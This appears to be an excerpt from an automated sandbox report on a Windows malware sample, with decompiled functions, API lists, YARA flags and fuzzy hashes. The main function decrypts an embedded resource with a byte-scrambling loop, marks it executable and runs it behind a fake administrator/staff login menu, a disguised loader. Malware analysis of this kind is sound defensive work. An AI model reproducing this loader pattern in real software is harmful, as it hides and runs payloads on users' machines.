                                              • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                              • Instruction Fuzzy Hash: CDE01AB12002086BDB10DF49CC85EE737ADAF88650F018555BA0C57241C934E8508BF5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041A0A0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0041A0A0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041A950(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                              0x0041a0a3
                                              0x0041a0ba
                                              0x0041a0c8

                                              APIs
                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0C8
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID:
                                              • API String ID: 621844428-0
                                              • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                              • Instruction ID: 12fe1e20a4fde289fa2c932464272cdbd0b6c77391ac3b13e7111125b87f0676
                                              • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                              • Instruction Fuzzy Hash: 14D012716102147BD620DB99CC85FD7779CDF48760F018465BA5C5B241C531BA1086E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0153967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 1ea904ca8a43c7e354807cc672f770957664de0dec9e6ce28ddebeea1a447b96
                                              • Instruction ID: e5194126be72169e0f4247d6002ddaf80edfc21c33366c0a0393524c53a908f9
                                              • Opcode Fuzzy Hash: 1ea904ca8a43c7e354807cc672f770957664de0dec9e6ce28ddebeea1a447b96
                                              • Instruction Fuzzy Hash: 75B09BB19464C5C6D612D7A4460871B7A5477D0745F16C451D1020B81B4778C091F5B5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Function 00D81000, Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 175libraryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 55%
                                              			E00D81000(void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				signed int _v5;
				signed int _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				char _v1048;
				char _v7712;
				void* __ebp;
				void* _t122;
				void* _t123;
				void* _t158;
				void* _t159;
				void* _t160;
				void* _t161;
				void* _t162;
				void* _t166;

				_t166 = __fp0;
				_t159 = __esi;
				_t158 = __edi;
				_t123 = __ecx;
				E00D88710(0x1e1c);
				_v16 = GetModuleHandleW(L"Kernel32.dll");
				E00D86B20(_t123);
				_v44 = E00D86A10(_v16, 0xb616c5d9);
				_v40 = E00D86A10(_v16, 0xe0baa99);
				_v32 = E00D86A10(LoadLibraryW(L"User32.dll"), 0x23fdef72);
				_v24 = E00D86A10(LoadLibraryW(L"User32.dll"), 0x695c9378);
				_v36 = E00D86A10(_v16, 0x9347c911);
				_v28 = _v36(0, L"IEUCIZEO", 0xa);
				_v20 = _v40(0, _v28);
				E00D87A80( &_v7712, _v20, 0x1a05);
				_t162 = _t161 + 0xc;
				_v12 = 0;
				while(_v12 < 0x1a05) {
					_v5 =  *((intOrPtr*)(_t160 + _v12 - 0x1e1c));
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) - 0x4b;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) >> 0x00000006 | (_v5 & 0x000000ff) << 0x00000002;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 = _v5 & 0x000000ff ^ 0x0000001b;
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - 0x97;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - 5;
					_v5 =  !(_v5 & 0x000000ff);
					 *((char*)(_t160 + _v12 - 0x1e1c)) = _v5;
					_v12 = _v12 + 1;
				}
				_v44( &_v7712, 0x1a05, 0x40,  &_v48);
				_v32(_v24(0, 0,  &_v7712,  &_v1048, 0, 0, 0, 0, 0));
				E00D82180( &_v7712, _t158, _t159, __eflags);
				while(1) {
					E00D81320(_t158, _t159, __eflags, 8, 9, 0x46, 0xd);
					E00D81250(0xa, 0xb);
					_push("Press A to Log in as ADMINISTRATOR or S to log in as STAFF\n\n\n\t\t\t\t\t");
					E00D870FC(_t122, _t158, _t159, __eflags);
					_t162 = _t162 + 4;
					__eflags = (_v5 & 0x000000ff) - 0x41;
					if((_v5 & 0x000000ff) == 0x41) {
						break;
					}
					__eflags = (_v5 & 0x000000ff) - 0x61;
					if((_v5 & 0x000000ff) != 0x61) {
						__eflags = (_v5 & 0x000000ff) - 0x53;
						if((_v5 & 0x000000ff) == 0x53) {
							L10:
							E00D835B0(_t122, _t158, _t159, _t166);
						} else {
							__eflags = (_v5 & 0x000000ff) - 0x73;
							if((_v5 & 0x000000ff) != 0x73) {
								__eflags = (_v5 & 0x000000ff) - 0x1b;
								if((_v5 & 0x000000ff) == 0x1b) {
									E00D87751(0);
								}
								__eflags = 1;
								if(1 != 0) {
									continue;
								}
							} else {
								goto L10;
							}
						}
					} else {
						break;
					}
					L14:
					__eflags = 0;
					return 0;
				}
				E00D82290(_t158, _t159, _t166);
				goto L14;
			}

























                                              0x00d81000
                                              0x00d81000
                                              0x00d81000
                                              0x00d81000
                                              0x00d81008
                                              0x00d81018
                                              0x00d8101b
                                              0x00d8102e
                                              0x00d8103f
                                              0x00d81058
                                              0x00d81071
                                              0x00d81082
                                              0x00d81091
                                              0x00d8109d
                                              0x00d810b0
                                              0x00d810b5
                                              0x00d810b8
                                              0x00d810ca
                                              0x00d810e1
                                              0x00d810eb
                                              0x00d810f5
                                              0x00d810fe
                                              0x00d81111
                                              0x00d8111a
                                              0x00d81124
                                              0x00d8112e
                                              0x00d81138
                                              0x00d81141
                                              0x00d8114e
                                              0x00d81157
                                              0x00d81161
                                              0x00d8116a
                                              0x00d81174
                                              0x00d8117d
                                              0x00d81186
                                              0x00d810c7
                                              0x00d810c7
                                              0x00d811a4
                                              0x00d811c7
                                              0x00d811ca
                                              0x00d811cf
                                              0x00d811d7
                                              0x00d811e0
                                              0x00d811e5
                                              0x00d811ea
                                              0x00d811ef
                                              0x00d811f6
                                              0x00d811f9
                                              0x00000000
                                              0x00000000
                                              0x00d811ff
                                              0x00d81202
                                              0x00d8120f
                                              0x00d81212
                                              0x00d8121d
                                              0x00d8121d
                                              0x00d81214
                                              0x00d81218
                                              0x00d8121b
                                              0x00d81228
                                              0x00d8122b
                                              0x00d8122f
                                              0x00d8122f
                                              0x00d81239
                                              0x00d8123b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00d8121b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00d8123d
                                              0x00d8123d
                                              0x00d81242
                                              0x00d81242
                                              0x00d81204
                                              0x00000000

                                              APIs
                                              • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00D88942,00D80000,00000000,00000000), ref: 00D81012
                                                • Part of subcall function 00D86B20: GetProcessHeap.KERNEL32(00000001,17D78400,00000000,?,?,00D81020,?,00D88942,00D80000,00000000,00000000), ref: 00D86B2C
                                                • Part of subcall function 00D86B20: HeapAlloc.KERNEL32(00000000,?,?,00D81020,?,00D88942,00D80000,00000000,00000000), ref: 00D86B33
                                                • Part of subcall function 00D86B20: GetProcessHeap.KERNEL32(00000001,00000000,00000000,17D78400,?,?,00D81020,?,00D88942,00D80000,00000000,00000000), ref: 00D86B6D
                                                • Part of subcall function 00D86B20: HeapAlloc.KERNEL32(00000000,?,?,00D81020,?,00D88942,00D80000,00000000,00000000), ref: 00D86B74
                                              • LoadLibraryW.KERNEL32(User32.dll,23FDEF72,?,0E0BAA99,?,B616C5D9,?,00D88942,00D80000,00000000,00000000), ref: 00D8104C
                                              • LoadLibraryW.KERNEL32(User32.dll,695C9378,00000000,?,00D88942,00D80000,00000000,00000000), ref: 00D81065
                                              • _memmove.LIBCMT ref: 00D810B0
                                              • _wprintf.LIBCMT ref: 00D811EA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382981299.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000002.00000002.382951504.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383023162.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383040167.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383052051.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Heap$AllocLibraryLoadProcess$HandleModule_memmove_wprintf
                                              • String ID: IEUCIZEO$Kernel32.dll$Press A to Log in as ADMINISTRATOR or S to log in as STAFF$User32.dll$User32.dll
                                              • API String ID: 2215760113-1224953502
                                              • Opcode ID: d7ebf4af52c79fe2bec2d8ea907d67fa56d8dbbe9725e7eedb4dc43078e98c68
                                              • Instruction ID: 4ef1d154a9fd4554469a6620f4d84a886d29f7c59e2a93ead367d02987612cd2
                                              • Opcode Fuzzy Hash: d7ebf4af52c79fe2bec2d8ea907d67fa56d8dbbe9725e7eedb4dc43078e98c68
                                              • Instruction Fuzzy Hash: 6F618D78D4C2D8BACB01EBF48895BFDBFB4AF16301F1480C5E595B6282C675474A8B31
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00417D6E, Relevance: .0, Instructions: 11COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c0ce8f1c3aa4012f251f59dece71f2095892068349a2116c45b7b025cfb71b0b
                                              • Instruction ID: 4e2c234bcb0d38d1cba9b2082b0ccae490d9c8c88aeeb5816115ab8aa9b732d1
                                              • Opcode Fuzzy Hash: c0ce8f1c3aa4012f251f59dece71f2095892068349a2116c45b7b025cfb71b0b
                                              • Instruction Fuzzy Hash: 7AA00117F850180144245C8A78414B5E3B8D1C74B7D5032BBDE0CF35001412C42901AD
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01539950, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e7eadea27871a59ff79972f81dee14e9c6ce8193d7e8a8a1ae4f13245388c1e2
                                              • Instruction ID: 630587c9c5c899223d31716daafc96b4a1e5dc5120dc43715c5b5120c9e50290
                                              • Opcode Fuzzy Hash: e7eadea27871a59ff79972f81dee14e9c6ce8193d7e8a8a1ae4f13245388c1e2
                                              • Instruction Fuzzy Hash: 229002B134140403D140659988046070055B7E0346F51C411A2054995ECA798C517179
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 015399D0, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d731d89f2076e720e6903496a8b6a265a125a5fbc9d7f70ae3197c62b3172700
                                              • Instruction ID: e099a7288ffaa4ef8fa681565308fa6fa2f5bc8fb8fe395f1f44d8d8dff35682
                                              • Opcode Fuzzy Hash: d731d89f2076e720e6903496a8b6a265a125a5fbc9d7f70ae3197c62b3172700
                                              • Instruction Fuzzy Hash: D09002B135100043D104619984047060095B7F1245F51C412A2144994CC5798C616169
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0153B040, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6f9581a8fd2bbbe972a5224a9424f36124dfdc3a4e6168215db6c911360d8991
                                              • Instruction ID: 91a79e894daf34ddbb9e7c23a2f379744b45a7df797776f456b370c12dc60f72
                                              • Opcode Fuzzy Hash: 6f9581a8fd2bbbe972a5224a9424f36124dfdc3a4e6168215db6c911360d8991
                                              • Instruction Fuzzy Hash: D69002B1741140434540B19988044065065B7F1345391C521A04449A0CC6B88855A2A9
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01539820, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d72da2d3ad51e834f99ed9f74ac37223435df400e294fb9cfce804bc6306cb49
                                              • Instruction ID: 0051d684c4bcd58b2ef5c0fa64bcf293c299816050978396cb601bd74f603feb
                                              • Opcode Fuzzy Hash: d72da2d3ad51e834f99ed9f74ac37223435df400e294fb9cfce804bc6306cb49
                                              • Instruction Fuzzy Hash: F090027138100403D141719984046060059B7E0285F91C412A0414994EC6A58A56BAA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 015398A0, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c7a8d7f1eae5dff0396282cb0802c4ade054431517f6f177966bb82de1cd5ad5
                                              • Instruction ID: 847f63950056d9adbdd87dfeb7362c985152d209ff1f26f96d322f481ded0964
                                              • Opcode Fuzzy Hash: c7a8d7f1eae5dff0396282cb0802c4ade054431517f6f177966bb82de1cd5ad5
                                              • Instruction Fuzzy Hash: 0890027134100403D102619984146060059F7E1389F91C412E1414995DC6758953B176
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01539B00, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8a4c8cfd285fe0284ab73a3d4e7044ce2d7b566c559236e7bdfcd90734b20cb4
                                              • Instruction ID: 692faf8f45b16624f826ef778b55b1e6fc47768ab760013368253923a1edfa6f
                                              • Opcode Fuzzy Hash: 8a4c8cfd285fe0284ab73a3d4e7044ce2d7b566c559236e7bdfcd90734b20cb4
                                              • Instruction Fuzzy Hash: E790027138100803D1407199C4147070056F7E0645F51C411A0014994DC666896576F5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0153A3B0, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 35673b156d2955e286e36dfaef7b73626a63036fa5ff37f975ee323d2fb17566
                                              • Instruction ID: bdbdb3dd388c4ff8514fcb9f33c7a9991669c209e846cb80d92d588002eeda38
                                              • Opcode Fuzzy Hash: 35673b156d2955e286e36dfaef7b73626a63036fa5ff37f975ee323d2fb17566
                                              • Instruction Fuzzy Hash: 3390027134144003D1407199C44460B5055B7F0345F51C811E0415994CC6658856A265
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01539A10, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6a2b31144443a4d925e1c8d02f75d3be582ae25bdd810359a0f020b66577459d
                                              • Instruction ID: 3eda634a022dc03aec61f9d77271ebef72c3a7a33d734ab4ecfae762cf4bef61
                                              • Opcode Fuzzy Hash: 6a2b31144443a4d925e1c8d02f75d3be582ae25bdd810359a0f020b66577459d
                                              • Instruction Fuzzy Hash: 5890027134140403D100619988087470055B7E0346F51C411A5154995EC6B5C8917575
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01539A80, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fcddfe62bc3be845d63cb7dde0ae86e5ce7ce7b798bfbf659fca6927695df4a2
                                              • Instruction ID: 50d154850a442b1b87fdf018567ccc4d002ec75eba472ae58ff1560b46e2c74f
                                              • Opcode Fuzzy Hash: fcddfe62bc3be845d63cb7dde0ae86e5ce7ce7b798bfbf659fca6927695df4a2
                                              • Instruction Fuzzy Hash: F090027134144443D14062998804B0F4155B7F1246F91C419A4146994CC96588556765
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01539560, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9b54bc2e6f13048b5e093a9440fc251000692d0f212ef4352c801886f80290b8
                                              • Instruction ID: 2c31b3d10c26cc7ffa8774e0eb87bb6fe2561c5cd020efa8adc057b06e059059
                                              • Opcode Fuzzy Hash: 9b54bc2e6f13048b5e093a9440fc251000692d0f212ef4352c801886f80290b8
                                              • Instruction Fuzzy Hash: 22900275361000030145A599460450B0495B7E6395391C415F14069D0CC67188656365
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0153AD30, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cecc8315e5d1476d879d7607eeb378ac4859cf509bbefdb1e70e60dd5dc82d7b
                                              • Instruction ID: 91c56f47ddeb633e9de6d61ace280c901ea42c02fdf20b0f5c77d1ed7cf8dc04
                                              • Opcode Fuzzy Hash: cecc8315e5d1476d879d7607eeb378ac4859cf509bbefdb1e70e60dd5dc82d7b
                                              • Instruction Fuzzy Hash: CB900271B45000139140719988146464056B7F0785B55C411A0504994CC9A48A5563E5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01539520, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 152f8fb6761f556046f9335578c1cddef211043f03a0f3a530b3bb65bd7216ba
                                              • Instruction ID: c8512fb068cacff08ea49a9e0ee041756767ed396281539b1bc8bd15aeb92d50
                                              • Opcode Fuzzy Hash: 152f8fb6761f556046f9335578c1cddef211043f03a0f3a530b3bb65bd7216ba
                                              • Instruction Fuzzy Hash: 3D9002F1341140934500A299C404B0A4555B7F0245B51C416E10449A0CC5758851A179
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 015395F0, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c69f2d21253e9bf238eb75cca4d0a37259b3c875e4e4f34446d713c5e37d5a2e
                                              • Instruction ID: e796fed55461723bc957c640bb373857f98a770ac823a1fab89a2406c878b758
                                              • Opcode Fuzzy Hash: c69f2d21253e9bf238eb75cca4d0a37259b3c875e4e4f34446d713c5e37d5a2e
                                              • Instruction Fuzzy Hash: 4590027134100803D104619988046860055B7E0345F51C411A6014A95ED6B588917175
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01539770, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8ba598d94e80a333445e163189b09c5064048e1eba4fbfa7ba966cd4bcccf5f3
                                              • Instruction ID: 4c2ea210fee3f79aa067113d8a5c68abdd5ef0e6213026e54dbc15aad0fd79ba
                                              • Opcode Fuzzy Hash: 8ba598d94e80a333445e163189b09c5064048e1eba4fbfa7ba966cd4bcccf5f3
                                              • Instruction Fuzzy Hash: E190027134504443D10065999408A060055B7E0249F51D411A10549D5DC6758851B175
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0153A770, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0fd0ccc9ed20089fc1b3add8b1e4003b302af4aebbd60f9c42d1e71870b88673
                                              • Instruction ID: fe907174c2d7ff11e12845206a08cedc85b0734c19483544e18505625a882d5a
                                              • Opcode Fuzzy Hash: 0fd0ccc9ed20089fc1b3add8b1e4003b302af4aebbd60f9c42d1e71870b88673
                                              • Instruction Fuzzy Hash: 0A90027534504443D50065999804A870055B7E0349F51D811A04149DCDC6A48861B165
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01539760, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d68afe37e6bec122d99d5243b6977c4415e75ff004d71bdc42eacbe20b23cea7
                                              • Instruction ID: 05d1fe73add1b80d851a2bf84fe78f625ebd3f00166717e00351a21ebc006f2d
                                              • Opcode Fuzzy Hash: d68afe37e6bec122d99d5243b6977c4415e75ff004d71bdc42eacbe20b23cea7
                                              • Instruction Fuzzy Hash: F390027134100403D100619995087070055B7E0245F51D811A0414998DD6A688517165
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0153A710, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d17ff7ccf3afe87b17280f6bcd1ab8c8651bce073ceebf629c2e88c26555a64b
                                              • Instruction ID: 887139fa9529ebdc9ab10b853fa5cfdd67a2d566642a708ca276bf1cacbbed44
                                              • Opcode Fuzzy Hash: d17ff7ccf3afe87b17280f6bcd1ab8c8651bce073ceebf629c2e88c26555a64b
                                              • Instruction Fuzzy Hash: 5F900271341000539500A6D99804A4A4155B7F0345B51D415A4004994CC5A488616165
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01539730, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a594d9a625d51d9e1fa32800be264b2ddae06e7650a901e72e7169f1dfae11ff
                                              • Instruction ID: 6c0212095b21e2476f77550c3cc022a7f78a8077bf99cc60ed7b4377d6294ffa
                                              • Opcode Fuzzy Hash: a594d9a625d51d9e1fa32800be264b2ddae06e7650a901e72e7169f1dfae11ff
                                              • Instruction Fuzzy Hash: 8490027174500403D140719994187060065B7E0245F51D411A0014994DC6A98A5576E5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01539FE0, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 463a05c65a78135d42f23c12668cb15e2b0594f1b3cef2d98b6384ba55eef7fc
                                              • Instruction ID: 708207c0cdb97a86a4bd6ecf6a73e337c4f1589abd486f1ecc5289ad41186761
                                              • Opcode Fuzzy Hash: 463a05c65a78135d42f23c12668cb15e2b0594f1b3cef2d98b6384ba55eef7fc
                                              • Instruction Fuzzy Hash: 9C90027135114403D1106199C4047060055B7E1245F51C811A0814998DC6E588917166
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01539650, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 875cc7269529d6c23c69946e0a41ea98b16c029f04d16d49f4968b5e6c23cae8
                                              • Instruction ID: 38ee5b1487ee48e3cfb9ec58aaa49b22c726505d2acaa416174cb79a1a84fe37
                                              • Opcode Fuzzy Hash: 875cc7269529d6c23c69946e0a41ea98b16c029f04d16d49f4968b5e6c23cae8
                                              • Instruction Fuzzy Hash: 1790027134504843D14071998404A460065B7E0349F51C411A0054AD4DD6758D55B6A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01539610, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 73c93bc255705ea5a0cc68b214bd5d9b9c0bd6423e36e1e751e56b878feef4b2
                                              • Instruction ID: a1f4017e355f5f9a6ac143b07fef73920fd4209a38a7747e8787aca54f61c89b
                                              • Opcode Fuzzy Hash: 73c93bc255705ea5a0cc68b214bd5d9b9c0bd6423e36e1e751e56b878feef4b2
                                              • Instruction Fuzzy Hash: 8A90027174500803D150719984147460055B7E0345F51C411A0014A94DC7A58A5576E5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 015396D0, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 48da56053a845cb404265f4f8bc24261d9fc0bb70af186ced45c40376bdd0f46
                                              • Instruction ID: 3ce1c821fe99132b30231850e2e585671a5bcd3bc12c4218f3ec6a30803af6f9
                                              • Opcode Fuzzy Hash: 48da56053a845cb404265f4f8bc24261d9fc0bb70af186ced45c40376bdd0f46
                                              • Instruction Fuzzy Hash: 2990027134100843D10061998404B460055B7F0345F51C416A0114A94DC665C8517565
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01539670, Relevance: .0, Instructions: 2COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                              • Instruction ID: 16fd9c65979abef42e20ae84e84d8bec4475ad92f8fda34e933ea9b894299ab2
                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                              • Instruction Fuzzy Hash:
                                              Uniqueness

                                              Uniqueness Score: -1.00%

